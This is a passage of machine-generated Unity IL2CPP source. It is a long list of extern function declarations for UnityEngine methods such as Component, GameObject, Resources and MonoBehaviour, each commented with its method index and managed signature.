extern void PlayerConnectionInternal__ctor_m522FC54B8DAAD52F95A07B1CA9E5AF0E36B13F45 (void);
// 0x000004D5 System.Void UnityEngine.PropertyAttribute::.ctor()
extern void PropertyAttribute__ctor_m19247686E165101F140615C7306DC2DA3953D97D (void);
// 0x000004D6 System.Void UnityEngine.TooltipAttribute::.ctor(System.String)
extern void TooltipAttribute__ctor_m9DA2380A6739B9D40E142C81E691BEBC7A79116F (void);
// 0x000004D7 System.Void UnityEngine.SpaceAttribute::.ctor()
extern void SpaceAttribute__ctor_mD1981FDED1C938017DBD5557E292408BC8F2618E (void);
// 0x000004D8 System.Void UnityEngine.SpaceAttribute::.ctor(System.Single)
extern void SpaceAttribute__ctor_mAA6E6B2811F7585F504FB0C06D52ABF82F560290 (void);
// 0x000004D9 System.Void UnityEngine.HeaderAttribute::.ctor(System.String)
extern void HeaderAttribute__ctor_mE368967744CF600B4A18E361E903FB0B010A8DC9 (void);
// 0x000004DA System.Void UnityEngine.RangeAttribute::.ctor(System.Single,System.Single)
extern void RangeAttribute__ctor_mFB67BD2663AD5B0D79F5E2D7E494FA8FCB21C6FF (void);
// 0x000004DB System.Void UnityEngine.MultilineAttribute::.ctor()
extern void MultilineAttribute__ctor_m5BAEA5EB5EB078477AC5007100DE70EC06F95BBE (void);
// 0x000004DC System.Void UnityEngine.TextAreaAttribute::.ctor(System.Int32,System.Int32)
extern void TextAreaAttribute__ctor_m5FEE25A73C001A99BC7A86895A0B88CF64FD6FA4 (void);
// 0x000004DD UnityEngine.PropertyName UnityEngine.PropertyNameUtils::PropertyNameFromString(System.String)
extern void PropertyNameUtils_PropertyNameFromString_m92870CD45E98808512BBBD986BA17B7F57AE52EC (void);
// 0x000004DE System.Void UnityEngine.PropertyNameUtils::PropertyNameFromString_Injected(System.String,UnityEngine.PropertyName&)
extern void PropertyNameUtils_PropertyNameFromString_Injected_m312B2B22255E4A1D9040E9D71BC9115DF7CFCA0D (void);
// 0x000004DF System.Void UnityEngine.PropertyName::.ctor(System.String)
extern void PropertyName__ctor_mFA341118B63F88B69464A6F1DF248B569686D778 (void);
// 0x000004E0 System.Void UnityEngine.PropertyName::.ctor(UnityEngine.PropertyName)
extern void PropertyName__ctor_m9F28B1DA9CEDDEAA6663C795456B9F5E95CAE92F (void);
// 0x000004E1 System.Boolean UnityEngine.PropertyName::IsNullOrEmpty(UnityEngine.PropertyName)
extern void PropertyName_IsNullOrEmpty_mFDF7EE642D43C06868265B85E47663A1F071ECCB (void);
// 0x000004E2 System.Boolean UnityEngine.PropertyName::op_Equality(UnityEngine.PropertyName,UnityEngine.PropertyName)
extern void PropertyName_op_Equality_mAEF78F551790B70DB41986B10E1E6A85A41C53C0 (void);
// 0x000004E3 System.Int32 UnityEngine.PropertyName::GetHashCode()
extern void PropertyName_GetHashCode_m7D4B878BA78625CDD78C9B045B5EADFDBF94C378 (void);
// 0x000004E4 System.Boolean UnityEngine.PropertyName::Equals(System.Object)
extern void PropertyName_Equals_mFD87005C352B7BEB4279560B1A489409B0692143 (void);
// 0x000004E5 System.Boolean UnityEngine.PropertyName::Equals(UnityEngine.PropertyName)
extern void PropertyName_Equals_m7D00F3B148E65210A82101C31F1F217C9527113E (void);
// 0x000004E6 UnityEngine.PropertyName UnityEngine.PropertyName::op_Implicit(System.String)
extern void PropertyName_op_Implicit_m8DD1EAEDC08A63ADB4A72C882329D68B54973DE9 (void);
// 0x000004E7 System.String UnityEngine.PropertyName::ToString()
extern void PropertyName_ToString_mDE271855F7B9A516185A66E12D90FE6B6C9DF6C0 (void);
// 0x000004E8 System.Single UnityEngine.Random::Range(System.Single,System.Single)
extern void Random_Range_mF26F26EB446B76823B4815C91FA0907B484DF02B (void);
// 0x000004E9 System.Int32 UnityEngine.Random::Range(System.Int32,System.Int32)
extern void Random_Range_mD4D2DEE3D2E75D07740C9A6F93B3088B03BBB8F8 (void);
// 0x000004EA System.Int32 UnityEngine.Random::RandomRangeInt(System.Int32,System.Int32)
extern void Random_RandomRangeInt_m198D6544B168F5302968DA1E7B32CB4DA4FFD9FA (void);
// 0x000004EB System.Single UnityEngine.Random::get_value()
extern void Random_get_value_m87344B352E686178D743B14C468EEE01757E9D43 (void);
// 0x000004EC UnityEngine.Shader UnityEngine.ResourcesAPIInternal::FindShaderByName(System.String)
extern void ResourcesAPIInternal_FindShaderByName_mCBB9F02459FC2130B49E25FC9285D4339A929D41 (void);
// 0x000004ED UnityEngine.Object UnityEngine.ResourcesAPIInternal::Load(System.String,System.Type)
extern void ResourcesAPIInternal_Load_m81B21CF82B21A433CE8F6B9F74647BA701B9A97D (void);
// 0x000004EE UnityEngine.ResourcesAPI UnityEngine.ResourcesAPI::get_ActiveAPI()
extern void ResourcesAPI_get_ActiveAPI_m5DE396B611C59182A60EB84C0A559FDDA88036E2 (void);
// 0x000004EF UnityEngine.ResourcesAPI UnityEngine.ResourcesAPI::get_overrideAPI()
extern void ResourcesAPI_get_overrideAPI_m3600AF874DC2A30ED0997DBC163942AF852ED3DF (void);
// 0x000004F0 System.Void UnityEngine.ResourcesAPI::.ctor()
extern void ResourcesAPI__ctor_m27A1A0B35DF74437840934A70F47DE1BAEAFECA0 (void);
// 0x000004F1 UnityEngine.Shader UnityEngine.ResourcesAPI::FindShaderByName(System.String)
extern void ResourcesAPI_FindShaderByName_m9A6287AA24EC06DBF3B2630618015B5CB6F01315 (void);
// 0x000004F2 UnityEngine.Object UnityEngine.ResourcesAPI::Load(System.String,System.Type)
extern void ResourcesAPI_Load_m54EE8C7AFD4B386B751AFC8C161B62CB2C983844 (void);
// 0x000004F3 System.Void UnityEngine.ResourcesAPI::.cctor()
extern void ResourcesAPI__cctor_m1376AFDA715987983B47797963B8D24ED5BC461B (void);
// 0x000004F4 T[] UnityEngine.Resources::ConvertObjects(UnityEngine.Object[])
// 0x000004F5 T UnityEngine.Resources::Load(System.String)
// 0x000004F6 UnityEngine.Object UnityEngine.Resources::Load(System.String,System.Type)
extern void Resources_Load_mDCC8EBD3196F1CE1B86E74416AD90CF86320C401 (void);
// 0x000004F7 UnityEngine.Object UnityEngine.Resources::GetBuiltinResource(System.Type,System.String)
extern void Resources_GetBuiltinResource_m8761B94EA68B13EC714994F6536B356A1AEF4538 (void);
// 0x000004F8 T UnityEngine.Resources::GetBuiltinResource(System.String)
// 0x000004F9 System.Void UnityEngine.AsyncOperation::InternalDestroy(System.IntPtr)
extern void AsyncOperation_InternalDestroy_mDB8F76E255DA6FADBA239E4D352FAE6DAEE8F699 (void);
// 0x000004FA System.Void UnityEngine.AsyncOperation::Finalize()
extern void AsyncOperation_Finalize_m8163934A18D3DAD2BF51272AAA35EAB1C7BBDE7D (void);
// 0x000004FB System.Void UnityEngine.AsyncOperation::InvokeCompletionEvent()
extern void AsyncOperation_InvokeCompletionEvent_m477EBEDE3FE8992BDC1DBFE02A313193CDA46DD4 (void);
// 0x000004FC System.Void UnityEngine.AsyncOperation::.ctor()
extern void AsyncOperation__ctor_m53CF89405A1E2DA6F517D05792826F5784B0D6EC (void);
// 0x000004FD System.Type UnityEngine.AttributeHelperEngine::GetParentTypeDisallowingMultipleInclusion(System.Type)
extern void AttributeHelperEngine_GetParentTypeDisallowingMultipleInclusion_m3E3F8CF6E0EEC531DA2BF637BBE8BDAEA2C8231D (void);
// 0x000004FE System.Type[] UnityEngine.AttributeHelperEngine::GetRequiredComponents(System.Type)
extern void AttributeHelperEngine_GetRequiredComponents_mC97CB5C0627F0F681AC04F4913038FF67DCE65A3 (void);
// 0x000004FF System.Int32 UnityEngine.AttributeHelperEngine::GetExecuteMode(System.Type)
extern void AttributeHelperEngine_GetExecuteMode_mBA3F224C08D5182797395CB6AA0EB1C4E37B99C8 (void);
// 0x00000500 System.Int32 UnityEngine.AttributeHelperEngine::CheckIsEditorScript(System.Type)
extern void AttributeHelperEngine_CheckIsEditorScript_m9D5FA968C3AB0F4C16CF820FBA366E575A448763 (void);
// 0x00000501 System.Int32 UnityEngine.AttributeHelperEngine::GetDefaultExecutionOrderFor(System.Type)
extern void AttributeHelperEngine_GetDefaultExecutionOrderFor_mB731EF2FA066172162193F49B7E73301AD6DD1A1 (void);
// 0x00000502 T UnityEngine.AttributeHelperEngine::GetCustomAttributeOfType(System.Type)
// 0x00000503 System.Void UnityEngine.AttributeHelperEngine::.cctor()
extern void AttributeHelperEngine__cctor_m87D49D12A1BE7FA0561A45399C74D06170ED7F0B (void);
// 0x00000504 System.Void UnityEngine.DisallowMultipleComponent::.ctor()
extern void DisallowMultipleComponent__ctor_mCED73439170619124E9FE0303137D0A7130C03B2 (void);
// 0x00000505 System.Void UnityEngine.RequireComponent::.ctor(System.Type)
extern void RequireComponent__ctor_mB1C4FD7EA20C0ADA84C7956B948A96856B2465A9 (void);
// 0x00000506 System.Void UnityEngine.AddComponentMenu::.ctor(System.String)
extern void AddComponentMenu__ctor_m0C9845C59ED5CB4BEDB86EBD14EC574E13240C1B (void);
// 0x00000507 System.Void UnityEngine.AddComponentMenu::.ctor(System.String,System.Int32)
extern void AddComponentMenu__ctor_mFC3F5A41F4F41587531E9352DEC243EE49A01C25 (void);
// 0x00000508 System.Void UnityEngine.CreateAssetMenuAttribute::set_menuName(System.String)
extern void CreateAssetMenuAttribute_set_menuName_m2D51E6DFEB3D5F310A643D965304CEDD85A8FCCA (void);
// 0x00000509 System.Void UnityEngine.CreateAssetMenuAttribute::set_fileName(System.String)
extern void CreateAssetMenuAttribute_set_fileName_mBE339C0FE5593AA2C0EE52E61AE2C3A2F1771496 (void);
// 0x0000050A System.Void UnityEngine.CreateAssetMenuAttribute::set_order(System.Int32)
extern void CreateAssetMenuAttribute_set_order_mCD6648DA2E94E0C9C1F462F9F00F71E4B2953AAA (void);
// 0x0000050B System.Void UnityEngine.CreateAssetMenuAttribute::.ctor()
extern void CreateAssetMenuAttribute__ctor_mE29F1B8C4AD3F80E740FFF5624A4BDB366FCB151 (void);
// 0x0000050C System.Void UnityEngine.ContextMenu::.ctor(System.String)
extern void ContextMenu__ctor_mCD05AD13A40676709620DD7D4A1A8DC787CE1351 (void);
// 0x0000050D System.Void UnityEngine.ContextMenu::.ctor(System.String,System.Boolean)
extern void ContextMenu__ctor_m963C5D6E8ECB19D41754EF3626E0707EC6812D02 (void);
// 0x0000050E System.Void UnityEngine.ContextMenu::.ctor(System.String,System.Boolean,System.Int32)
extern void ContextMenu__ctor_m22CF01682EFB1927001E394DC4F378E4F6E131CF (void);
// 0x0000050F System.Void UnityEngine.ExecuteInEditMode::.ctor()
extern void ExecuteInEditMode__ctor_mAA44FC0120898DDA33D063EF3692B7F0F22AD792 (void);
// 0x00000510 System.Void UnityEngine.ExecuteAlways::.ctor()
extern void ExecuteAlways__ctor_m2792EFBEBCECA35F3C1EB12B3BE9290B734C4A46 (void);
// 0x00000511 System.Void UnityEngine.HideInInspector::.ctor()
extern void HideInInspector__ctor_m6F39BCE00C935AB46163661E9D4B0B6A6B7976DE (void);
// 0x00000512 System.Void UnityEngine.HelpURLAttribute::.ctor(System.String)
extern void HelpURLAttribute__ctor_m4671D9179DCF032E9F769A70A1665B1B60B233A7 (void);
// 0x00000513 System.Void UnityEngine.DefaultExecutionOrder::.ctor(System.Int32)
extern void DefaultExecutionOrder__ctor_mD02339C868E98633AB5836930A963A506CCC9D1D (void);
// 0x00000514 System.Int32 UnityEngine.DefaultExecutionOrder::get_order()
extern void DefaultExecutionOrder_get_order_m362E5F2AB40AAA5154301F88DE93B80F865A31AF (void);
// 0x00000515 System.Void UnityEngine.ExcludeFromPresetAttribute::.ctor()
extern void ExcludeFromPresetAttribute__ctor_m6BBE5C9A0F32E56C97AE0A9A6FB66CC7DDC8C93A (void);
// 0x00000516 System.Boolean UnityEngine.Behaviour::get_enabled()
extern void Behaviour_get_enabled_mAAC9F15E9EBF552217A5AE2681589CC0BFA300C1 (void);
// 0x00000517 System.Void UnityEngine.Behaviour::set_enabled(System.Boolean)
extern void Behaviour_set_enabled_mF1DCFE60EB09E0529FE9476CA804A3AA2D72B16A (void);
// 0x00000518 System.Boolean UnityEngine.Behaviour::get_isActiveAndEnabled()
extern void Behaviour_get_isActiveAndEnabled_mEB4ECCE9761A7016BC619557CEFEA1A30D3BF28A (void);
// 0x00000519 System.Void UnityEngine.Behaviour::.ctor()
extern void Behaviour__ctor_m00422B6EFEA829BCB116D715E74F1EAD2CB6F4F8 (void);
// 0x0000051A System.Void UnityEngine.ClassLibraryInitializer::Init()
extern void ClassLibraryInitializer_Init_m2D841B7BCF4CCDEB6D38D3956B1D8E8051F2CF5C (void);
// 0x0000051B UnityEngine.Transform UnityEngine.Component::get_transform()
extern void Component_get_transform_m2919A1D81931E6932C7F06D4C2F0AB8DDA9A5371 (void);
// 0x0000051C UnityEngine.GameObject UnityEngine.Component::get_gameObject()
extern void Component_get_gameObject_m57AEFBB14DB39EC476F740BA000E170355DE691B (void);
// 0x0000051D UnityEngine.Component UnityEngine.Component::GetComponent(System.Type)
extern void Component_GetComponent_m4352437B839B9601EB007CAC1007C8E1FB8A427D (void);
// 0x0000051E System.Void UnityEngine.Component::GetComponentFastPath(System.Type,System.IntPtr)
extern void Component_GetComponentFastPath_mE4FD8E93F76B2C79314274295DBB74B0FC250EA0 (void);
// 0x0000051F T UnityEngine.Component::GetComponent()
// 0x00000520 System.Boolean UnityEngine.Component::TryGetComponent(T&)
// 0x00000521 UnityEngine.Component UnityEngine.Component::GetComponentInChildren(System.Type,System.Boolean)
extern void Component_GetComponentInChildren_m4050899166730E8F6629B895597CF4ECC894B597 (void);
// 0x00000522 T UnityEngine.Component::GetComponentInChildren()
// 0x00000523 T[] UnityEngine.Component::GetComponentsInChildren(System.Boolean)
// 0x00000524 System.Void UnityEngine.Component::GetComponentsInChildren(System.Boolean,System.Collections.Generic.List`1<T>)
// 0x00000525 T[] UnityEngine.Component::GetComponentsInChildren()
// 0x00000526 System.Void UnityEngine.Component::GetComponentsInChildren(System.Collections.Generic.List`1<T>)
// 0x00000527 UnityEngine.Component UnityEngine.Component::GetComponentInParent(System.Type,System.Boolean)
extern void Component_GetComponentInParent_mA402B7F87D23E039BB045630E5EA3AC020D8A7C2 (void);
// 0x00000528 T UnityEngine.Component::GetComponentInParent()
// 0x00000529 T[] UnityEngine.Component::GetComponentsInParent(System.Boolean)
// 0x0000052A System.Void UnityEngine.Component::GetComponentsInParent(System.Boolean,System.Collections.Generic.List`1<T>)
// 0x0000052B T[] UnityEngine.Component::GetComponentsInParent()
// 0x0000052C UnityEngine.Component[] UnityEngine.Component::GetComponents(System.Type)
extern void Component_GetComponents_m683496B86CDC639A81EC67D834317926B371FAE1 (void);
// 0x0000052D System.Void UnityEngine.Component::GetComponentsForListInternal(System.Type,System.Object)
extern void Component_GetComponentsForListInternal_m7B3A61AF88E5E6F845817EC28E22FD39944EFBC7 (void);
// 0x0000052E System.Void UnityEngine.Component::GetComponents(System.Type,System.Collections.Generic.List`1<UnityEngine.Component>)
extern void Component_GetComponents_mFD04B9CB0BD37505417054D614436B5844DC4365 (void);
// 0x0000052F System.Void UnityEngine.Component::GetComponents(System.Collections.Generic.List`1<T>)
// 0x00000530 System.String UnityEngine.Component::get_tag()
extern void Component_get_tag_m7561A81116CAB82B8A459E934662BFC2039FB7EF (void);
// 0x00000531 T[] UnityEngine.Component::GetComponents()
// 0x00000532 System.Boolean UnityEngine.Component::CompareTag(System.String)
extern void Component_CompareTag_mE6F8897E84F12DF12D302FFC4D58204D51096FC5 (void);
// 0x00000533 System.Void UnityEngine.Component::.ctor()
extern void Component__ctor_m4319162A6E6B02301078C1233F6E7F4A3E735486 (void);
// 0x00000534 System.Void UnityEngine.Coroutine::.ctor()
extern void Coroutine__ctor_m65324E0C6062163C0378CD4190E903B4C2ED75DD (void);
// 0x00000535 System.Void UnityEngine.Coroutine::Finalize()
extern void Coroutine_Finalize_m83673D20AB464E4C866408F798D5CA1F0391808D (void);
// 0x00000536 System.Void UnityEngine.Coroutine::ReleaseCoroutine(System.IntPtr)
extern void Coroutine_ReleaseCoroutine_m0B7D5B0B89BB1B66D633A83ECD565121A0921FA4 (void);
// 0x00000537 System.Void UnityEngine.SetupCoroutine::InvokeMoveNext(System.Collections.IEnumerator,System.IntPtr)
extern void SetupCoroutine_InvokeMoveNext_m4C8B79D8A35F69EEECAA16C82793525E74D75CE9 (void);
// 0x00000538 System.Object UnityEngine.SetupCoroutine::InvokeMember(System.Object,System.String,System.Object)
extern void SetupCoroutine_InvokeMember_m6E51A48B37F103235272E6DAE80C5AE88F10A5EE (void);
// 0x00000539 System.Boolean UnityEngine.CustomYieldInstruction::get_keepWaiting()
// 0x0000053A System.Object UnityEngine.CustomYieldInstruction::get_Current()
extern void CustomYieldInstruction_get_Current_m6F1287B6C4A16C875913A556D66ACB1BF599E6AF (void);
// 0x0000053B System.Boolean UnityEngine.CustomYieldInstruction::MoveNext()
extern void CustomYieldInstruction_MoveNext_m875CC6944F46765EB3BE14306E83E7C54CBEB2CF (void);
// 0x0000053C System.Void UnityEngine.CustomYieldInstruction::Reset()
extern void CustomYieldInstruction_Reset_mA357794CF2260A3E48748612BDE01CB0B7CF8A8D (void);
// 0x0000053D System.Void UnityEngine.CustomYieldInstruction::.ctor()
extern void CustomYieldInstruction__ctor_mB64531EC09E871EF60BFAC16918A774C977C7B50 (void);
// 0x0000053E System.Void UnityEngine.ExcludeFromObjectFactoryAttribute::.ctor()
extern void ExcludeFromObjectFactoryAttribute__ctor_m547CE65CC098EB4466C456476ECF2D78E2834FBB (void);
// 0x0000053F System.Void UnityEngine.ExtensionOfNativeClassAttribute::.ctor()
extern void ExtensionOfNativeClassAttribute__ctor_m64B864DD565CE1BF04DA861E6759163A1727F6A1 (void);
// 0x00000540 UnityEngine.GameObject UnityEngine.GameObject::CreatePrimitive(UnityEngine.PrimitiveType)
extern void GameObject_CreatePrimitive_mE2F848626FE928B6E3810ABFB81867E619BB2507 (void);
// 0x00000541 T UnityEngine.GameObject::GetComponent()
// 0x00000542 UnityEngine.Component UnityEngine.GameObject::GetComponent(System.Type)
extern void GameObject_GetComponent_m99E12753EA84947521DC711CA33F452B5E65B474 (void);
// 0x00000543 System.Void UnityEngine.GameObject::GetComponentFastPath(System.Type,System.IntPtr)
extern void GameObject_GetComponentFastPath_mF0B51884C05EE32D44B55E8511D7FCD977918058 (void);
// 0x00000544 UnityEngine.Component UnityEngine.GameObject::GetComponentInChildren(System.Type,System.Boolean)
extern void GameObject_GetComponentInChildren_m4A3692D1D93C726D5B02E588130C782A336961D5 (void);
// 0x00000545 T UnityEngine.GameObject::GetComponentInChildren()
// 0x00000546 T UnityEngine.GameObject::GetComponentInChildren(System.Boolean)
// 0x00000547 UnityEngine.Component UnityEngine.GameObject::GetComponentInParent(System.Type,System.Boolean)
extern void GameObject_GetComponentInParent_m80F84FC4D405C1F9987C0E77385749814AD0027C (void);
// 0x00000548 T UnityEngine.GameObject::GetComponentInParent()
// 0x00000549 T UnityEngine.GameObject::GetComponentInParent(System.Boolean)
// 0x0000054A System.Array UnityEngine.GameObject::GetComponentsInternal(System.Type,System.Boolean,System.Boolean,System.Boolean,System.Boolean,System.Object)
extern void GameObject_GetComponentsInternal_m5D5FD903F9CB151AC9782E5840D397F422A82F95 (void);
// 0x0000054B UnityEngine.Component[] UnityEngine.GameObject::GetComponents(System.Type)
extern void GameObject_GetComponents_m967DC44523FB7DB85C2D2433B1E53AB24BD551B2 (void);
// 0x0000054C T[] UnityEngine.GameObject::GetComponents()
// 0x0000054D System.Void UnityEngine.GameObject::GetComponents(System.Collections.Generic.List`1<T>)
// 0x0000054E T[] UnityEngine.GameObject::GetComponentsInChildren(System.Boolean)
// 0x0000054F System.Void UnityEngine.GameObject::GetComponentsInChildren(System.Boolean,System.Collections.Generic.List`1<T>)
// 0x00000550 T[] UnityEngine.GameObject::GetComponentsInChildren()
// 0x00000551 System.Void UnityEngine.GameObject::GetComponentsInParent(System.Boolean,System.Collections.Generic.List`1<T>)
// 0x00000552 T[] UnityEngine.GameObject::GetComponentsInParent(System.Boolean)
// 0x00000553 System.Boolean UnityEngine.GameObject::TryGetComponent(T&)
// 0x00000554 System.Void UnityEngine.GameObject::TryGetComponentFastPath(System.Type,System.IntPtr)
extern void GameObject_TryGetComponentFastPath_m1F071538D2B2D1C943BE663CE8AEED6C1DEEEE27 (void);
// 0x00000555 UnityEngine.Component UnityEngine.GameObject::Internal_AddComponentWithType(System.Type)
extern void GameObject_Internal_AddComponentWithType_m2D986297A2133DD6896D9715F22C9627991D07FF (void);
// 0x00000556 UnityEngine.Component UnityEngine.GameObject::AddComponent(System.Type)
extern void GameObject_AddComponent_mDF246771EC34613FA6AF0C98D443368FB43E9F36 (void);
// 0x00000557 T UnityEngine.GameObject::AddComponent()
// 0x00000558 UnityEngine.Transform UnityEngine.GameObject::get_transform()
extern void GameObject_get_transform_m0BC10ADFA1632166AE5544BDF9038A2650C2AE56 (void);
// 0x00000559 System.Int32 UnityEngine.GameObject::get_layer()
extern void GameObject_get_layer_m108902B9C89E9F837CE06B9942AA42307450FEAF (void);
// 0x0000055A System.Void UnityEngine.GameObject::set_layer(System.Int32)
extern void GameObject_set_layer_m6E1AF478A2CC86BD222B96317BEB78B7D89B18D0 (void);
// 0x0000055B System.Void UnityEngine.GameObject::SetActive(System.Boolean)
extern void GameObject_SetActive_m638E92E1E75E519E5B24CF150B08CA8E0CDFAB92 (void);
// 0x0000055C System.Boolean UnityEngine.GameObject::get_activeSelf()
extern void GameObject_get_activeSelf_m4F3E5240E138B66AAA080EA30759A3D0517DA368 (void);
// 0x0000055D System.Boolean UnityEngine.GameObject::get_activeInHierarchy()
extern void GameObject_get_activeInHierarchy_m49250F4F168DCC5388D5BE4F6A5681386907B109 (void);
// 0x0000055E System.Void UnityEngine.GameObject::set_isStatic(System.Boolean)
extern void GameObject_set_isStatic_m0468F0E4553F5B3DDBE03F3788BE0A1A3736839C (void);
// 0x0000055F System.String UnityEngine.GameObject::get_tag()
extern void GameObject_get_tag_mEDD27BF795072834D656B286CBE51B2C99747805 (void);
// 0x00000560 System.Boolean UnityEngine.GameObject::CompareTag(System.String)
extern void GameObject_CompareTag_m6378BE50D009A93D46036F74CC3F7E2ECB0636E5 (void);
// 0x00000561 UnityEngine.GameObject[] UnityEngine.GameObject::FindGameObjectsWithTag(System.String)
extern void GameObject_FindGameObjectsWithTag_m63AB9863553265F03EDE4C11AEA98AF591CAEA1E (void);
// 0x00000562 System.Void UnityEngine.GameObject::SendMessage(System.String,System.Object,UnityEngine.SendMessageOptions)
extern void GameObject_SendMessage_m452B3418BE240EC79550C15E1F2EAE61488F06DF (void);
// 0x00000563 System.Void UnityEngine.GameObject::BroadcastMessage(System.String,System.Object,UnityEngine.SendMessageOptions)
extern void GameObject_BroadcastMessage_m9ECE0B5D046E272E160714135F1C9D222F875AE7 (void);
// 0x00000564 System.Void UnityEngine.GameObject::BroadcastMessage(System.String)
extern void GameObject_BroadcastMessage_mB51BBADA9206219343B0E7C4199F75BAFEF19A78 (void);
// 0x00000565 System.Void UnityEngine.GameObject::.ctor(System.String)
extern void GameObject__ctor_m37D512B05D292F954792225E6C6EEE95293A9B88 (void);
// 0x00000566 System.Void UnityEngine.GameObject::.ctor()
extern void GameObject__ctor_m7D0340DE160786E6EFA8DABD39EC3B694DA30AAD (void);
// 0x00000567 System.Void UnityEngine.GameObject::.ctor(System.String,System.Type[])
extern void GameObject__ctor_m721D643351E55308EA4F5F41B67D5446D11C61F0 (void);
// 0x00000568 System.Void UnityEngine.GameObject::Internal_CreateGameObject(UnityEngine.GameObject,System.String)
extern void GameObject_Internal_CreateGameObject_mFABE4AB825D9A336A69BD2C45F0506DFEC9F62F9 (void);
// 0x00000569 UnityEngine.GameObject UnityEngine.GameObject::Find(System.String)
extern void GameObject_Find_mFF1D6C65A7E2CD82443F4DCE4C53472FB30B7F51 (void);
// 0x0000056A System.Int32 UnityEngine.LayerMask::op_Implicit(UnityEngine.LayerMask)
extern void LayerMask_op_Implicit_m5D697E103A7CB05CADCED9F90FD4F6BAE955E763 (void);
// 0x0000056B UnityEngine.LayerMask UnityEngine.LayerMask::op_Implicit(System.Int32)
extern void LayerMask_op_Implicit_mDC9C22C4477684D460FCF25B1BFE6B54419FB922 (void);
// 0x0000056C System.Int32 UnityEngine.LayerMask::get_value()
extern void LayerMask_get_value_m70CBE32210A1F0FD4ECB850285DA90ED57B87974 (void);
// 0x0000056D System.Int32 UnityEngine.LayerMask::NameToLayer(System.String)
extern void LayerMask_NameToLayer_mEA9343DFAF52541409F557BBB4FAC0E92E2FBF6B (void);
// 0x0000056E System.Void UnityEngine.ManagedStreamHelpers::ValidateLoadFromStream(System.IO.Stream)
extern void ManagedStreamHelpers_ValidateLoadFromStream_m4D3540AC5E72B77BBC197B5C9C2C9AD85EF8E215 (void);
// 0x0000056F System.Void UnityEngine.ManagedStreamHelpers::ManagedStreamRead(System.Byte[],System.Int32,System.Int32,System.IO.Stream,System.IntPtr)
extern void ManagedStreamHelpers_ManagedStreamRead_m16D4326A97D7C8D8D12F11AF9CCEB78CBB574DD8 (void);
// 0x00000570 System.Void UnityEngine.ManagedStreamHelpers::ManagedStreamSeek(System.Int64,System.UInt32,System.IO.Stream,System.IntPtr)
extern void ManagedStreamHelpers_ManagedStreamSeek_m49FE73EE67BFC6EB9F57B31BC8E8D4D3DC84025C (void);
// 0x00000571 System.Void UnityEngine.ManagedStreamHelpers::ManagedStreamLength(System.IO.Stream,System.IntPtr)
extern void ManagedStreamHelpers_ManagedStreamLength_m41B99C70D4CA92BEF242D2EE9EB71AB95E3AD48F (void);
// 0x00000572 System.Boolean UnityEngine.MonoBehaviour::IsInvoking()
extern void MonoBehaviour_IsInvoking_mF7CF0A2ABF31B61FC67A75E9210C16683E5020A0 (void);
// 0x00000573 System.Void UnityEngine.MonoBehaviour::CancelInvoke()
extern void MonoBehaviour_CancelInvoke_m177BCBDFCEA3E09C02E3E444BF4FBA648FAE3CFA (void);
// 0x00000574 System.Void UnityEngine.MonoBehaviour::Invoke(System.String,System.Single)
extern void MonoBehaviour_Invoke_mF724350C59362B0F1BFE26383209A274A29A63FB (void);
// 0x00000575 System.Void UnityEngine.MonoBehaviour::InvokeRepeating(System.String,System.Single,System.Single)
extern void MonoBehaviour_InvokeRepeating_mF208501E0E4918F9168BBBA5FC50D8F80D01514D (void);
// 0x00000576 System.Void UnityEngine.MonoBehaviour::CancelInvoke(System.String)
extern void MonoBehaviour_CancelInvoke_m268FFD58AFF64C07FD4C9B9B8B85F58BD86F3A01 (void);
// 0x00000577 System.Boolean UnityEngine.MonoBehaviour::IsInvoking(System.String)
extern void MonoBehaviour_IsInvoking_m9CD08C2F7F5E83660FFE3B5A373B202CCBDB3708 (void);
// 0x00000578 UnityEngine.Coroutine UnityEngine.MonoBehaviour::StartCoroutine(System.String)
extern void MonoBehaviour_StartCoroutine_m10C4B693B96175C42B0FD00911E072701C220DB4 (void);
// 0x00000579 UnityEngine.Coroutine UnityEngine.MonoBehaviour::StartCoroutine(System.String,System.Object)
extern void MonoBehaviour_StartCoroutine_mD754B72714F15210DDA429A096D853852FF437AB (void);
// 0x0000057A UnityEngine.Coroutine UnityEngine.MonoBehaviour::StartCoroutine(System.Collections.IEnumerator)
extern void MonoBehaviour_StartCoroutine_m4CAFF732AA28CD3BDC5363B44A863575530EC812 (void);
// 0x0000057B UnityEngine.Coroutine UnityEngine.MonoBehaviour::StartCoroutine_Auto(System.Collections.IEnumerator)
extern void MonoBehaviour_StartCoroutine_Auto_m97F469F18612A2208D2EFDB3274DF0B4E3C9F4E6 (void);
// 0x0000057C System.Void UnityEngine.MonoBehaviour::StopCoroutine(System.Collections.IEnumerator)
extern void MonoBehaviour_StopCoroutine_mF9E93B82091E804595BE13AA29F9AB7517F7E04A (void);
// 0x0000057D System.Void UnityEngine.MonoBehaviour::StopCoroutine(UnityEngine.Coroutine)
extern void MonoBehaviour_StopCoroutine_mB0FC91BE84203BD8E360B3FBAE5B958B4C5ED22A (void);
// 0x0000057E System.Void UnityEngine.MonoBehaviour::StopCoroutine(System.String)
extern void MonoBehaviour_StopCoroutine_m1DA0B9343DCDB53221A6CD707CBF0827A6FFF17F (void);
// 0x0000057F System.Void UnityEngine.MonoBehaviour::StopAllCoroutines()
extern void MonoBehaviour_StopAllCoroutines_m872033451D42013A99867D09337490017E9ED318 (void);
// 0x00000580 System.Boolean UnityEngine.MonoBehaviour::get_useGUILayout()
extern void MonoBehaviour_get_useGUILayout_mBCD040C678BF8521BFBAB8FD59BC566B1F5BED89 (void);
// 0x00000581 System.Void UnityEngine.MonoBehaviour::set_useGUILayout(System.Boolean)
extern void MonoBehaviour_set_useGUILayout_m56F0C62F4B6889D7472074ECCB56EBA462285134 (void);
// 0x00000582 System.Void UnityEngine.MonoBehaviour::print(System.Object)
extern void MonoBehaviour_print_mED815C779E369787B3E9646A6DE96FBC2944BF0B (void);
// 0x00000583 System.Void UnityEngine.MonoBehaviour::Internal_CancelInvokeAll(UnityEngine.MonoBehaviour)
extern void MonoBehaviour_Internal_CancelInvokeAll_m53AE6F61FC17C80D4E6F247F2FC4044546C50C3A (void);
// 0x00000584 System.Boolean UnityEngine.MonoBehaviour::Internal_IsInvokingAll(UnityEngine.MonoBehaviour)
extern void MonoBehaviour_Internal_IsInvokingAll_mA5F09100D0C010BD428927075C484F53ED2062DA (void);
// 0x00000585 System.Void UnityEngine.MonoBehaviour::InvokeDelayed(UnityEngine.MonoBehaviour,System.String,System.Single,System.Single)
extern void MonoBehaviour_InvokeDelayed_m62CC0F5301AF54A302648EC327A7164F42DE3496 (void);
// 0x00000586 System.Void UnityEngine.MonoBehaviour::CancelInvoke(UnityEngine.MonoBehaviour,System.String)
